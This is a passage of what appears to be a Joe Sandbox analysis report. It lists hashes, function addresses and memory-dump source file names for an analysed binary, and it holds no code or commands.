                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
                                                                                                                          • Instruction ID: a9b954b3ba0417e1a316acc545e0c0cee64d50b018791d4cc7d99a8413559e84
                                                                                                                          • Opcode Fuzzy Hash: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
                                                                                                                          • Instruction Fuzzy Hash: ACD0A731A08321469F748E1DE400977F7F0EAC7B11F49999EF686E3248D230DC81D6A9
                                                                                                                          Function 00B11ACD Relevance: .0, Instructions: 14COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: a24cdafb56d98720096e02494b00ac6615ca4c8bdec182ffb656017d31b5cb45
                                                                                                                          • Instruction ID: 91d9bd1291e785f2d4ad4f0f3aabbc048fdb4cae854ffb72640ae8ed5b87cb2f
                                                                                                                          • Opcode Fuzzy Hash: a24cdafb56d98720096e02494b00ac6615ca4c8bdec182ffb656017d31b5cb45
                                                                                                                          • Instruction Fuzzy Hash: 88C01238A681028B82048F04A8A5536A6B8A70720D740602ADA02E7321DE20C4128909
                                                                                                                          Function 00B46094 Relevance: .0, Instructions: 12COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 01f32bc81ef65a3a25589c2c208f9f4218301fd6539a66dde92a0650c7bf46fb
                                                                                                                          • Instruction ID: 2b7b117ee6d753c764b0e4ceeb88845fa038f28e1b2029d0d79da5379347b704
                                                                                                                          • Opcode Fuzzy Hash: 01f32bc81ef65a3a25589c2c208f9f4218301fd6539a66dde92a0650c7bf46fb
                                                                                                                          • Instruction Fuzzy Hash: 67C02B3461C20083914CCF04D840530F3F78B87F45720B08DC80323342C430C116940D
                                                                                                                          Function 00B11A3C Relevance: .0, Instructions: 12COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: a4c1114c4afb8c55420949bbcc07c5499d66d8b6ca700d24b8b80d0bf75a133c
                                                                                                                          • Instruction ID: 844d78f4368b769b40cbedb219333a3e3887dcbc6799e1c5049ea968127d427c
                                                                                                                          • Opcode Fuzzy Hash: a4c1114c4afb8c55420949bbcc07c5499d66d8b6ca700d24b8b80d0bf75a133c
                                                                                                                          • Instruction Fuzzy Hash: 79C09B38F69042CBC244CF89E8E1472A7FC670720C750343A9713F7361DD60D5158509
                                                                                                                          Function 00B45FD6 Relevance: .0, Instructions: 11COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 4fe205874ec013eb474937daf54a255fd0bf9444d3153bdf0682b48b9687455a
                                                                                                                          • Instruction ID: 602429fde34480256d404a1ad5edf340c0f851e18dc95950b6a95e5377d58777
                                                                                                                          • Opcode Fuzzy Hash: 4fe205874ec013eb474937daf54a255fd0bf9444d3153bdf0682b48b9687455a
                                                                                                                          • Instruction Fuzzy Hash: C7C09B2476820047928CDF14DD51635F2F79B87D55714B05DC80563355D534D511850C